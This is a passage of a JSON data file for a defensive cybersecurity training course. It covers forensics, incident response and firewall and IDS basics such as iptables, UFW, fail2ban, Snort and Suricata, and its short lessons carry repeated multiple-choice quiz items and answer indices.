with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-malware-dynamic","cat":"Forensics & IR","title":"Malware Dynamic Analysis","diff":3,"xp":200,"intro":"Run malware in a sandbox to observe behavior.","sections":[{"type":"text","content":"Run malware in a sandbox to observe behavior."},{"type":"code","lang":"bash","content":"Process Monitor, Wireshark, API Monitor, Regshot \u2014 monitor all changes"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Dynamic analysis requires...","opts":["Source code","Running malware in an isolated environment","The encryption key","Admin approval"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-incident-lifecycle","cat":"Forensics & IR","title":"IR Lifecycle","diff":1,"xp":75,"intro":"Preparation -> Detection -> Containment -> Eradication -> Recovery -> Lessons.","sections":[{"type":"text","content":"Preparation -> Detection -> Containment -> Eradication -> Recovery -> Lessons."},{"type":"code","lang":"bash","content":"NIST framework: structured approach to handling security incidents"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"What comes after containment?","opts":["Detection","Eradication","Preparation","Recovery"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-containment","cat":"Forensics & IR","title":"Incident Containment","diff":1,"xp":75,"intro":"Stop the bleeding \u2014 isolate compromised systems.","sections":[{"type":"text","content":"Stop the bleeding \u2014 isolate compromised systems."},{"type":"code","lang":"bash","content":"Network isolation, disable accounts, block IPs, preserve evidence"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Containment goal is...","opts":["Delete malware","Prevent further damage and spread","Find the attacker","Write a report"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"df-df-iptables","cat":"Defense & Blue Team","title":"iptables Fundamentals","diff":1,"xp":75,"intro":"Linux firewall rule management.","sections":[{"type":"text","content":"Linux firewall rule management."},{"type":"code","lang":"bash","content":"INPUT, OUTPUT, FORWARD chains. Default deny, explicit allow"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Default deny drops...","opts":["Specific IPs","Everything not explicitly allowed","Nothing","All outbound"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-ufw","cat":"Defense & Blue Team","title":"UFW Simplified Firewall","diff":1,"xp":50,"intro":"Ubuntu's user-friendly iptables frontend.","sections":[{"type":"text","content":"Ubuntu's user-friendly iptables frontend."},{"type":"code","lang":"bash","content":"ufw enable, ufw default deny incoming, ufw allow ssh"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"UFW is a frontend for...","opts":["nftables","iptables","firewalld","Windows Firewall"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-fail2ban","cat":"Defense & Blue Team","title":"fail2ban Setup","diff":1,"xp":75,"intro":"Auto-ban IPs with too many failed logins.","sections":[{"type":"text","content":"Auto-ban IPs with too many failed logins."},{"type":"code","lang":"bash","content":"Monitors logs, adds iptables rules to block offending IPs"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"fail2ban blocks IPs by adding...","opts":["DNS entries","iptables rules","Firewall policies","Router ACLs"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-snort","cat":"Defense & Blue Team","title":"Snort IDS Rules","diff":2,"xp":150,"intro":"Write network intrusion detection signatures.","sections":[{"type":"text","content":"Write network intrusion detection signatures."},{"type":"code","lang":"bash","content":"alert tcp -> content matching -> sid/rev identification"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Snort rules match on...","opts":["File hashes","Network packet content and metadata","Registry keys","Process names"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-df-suricata","cat":"Defense & Blue Team","title":"Suricata IDS","diff":2,"xp":150,"intro":"Multi-threaded, protocol-aware network IDS/IPS.","sections":[{"type":"text","content":"Multi-threaded, protocol-aware network IDS/IPS."},{"type":"code","lang":"bash","content":"Faster than Snort, application-layer detection, can run as IPS"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Suricata's advantage...","opts":["Simpler rules","Multi-threaded processing","Fewer features","Cloud-only"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet 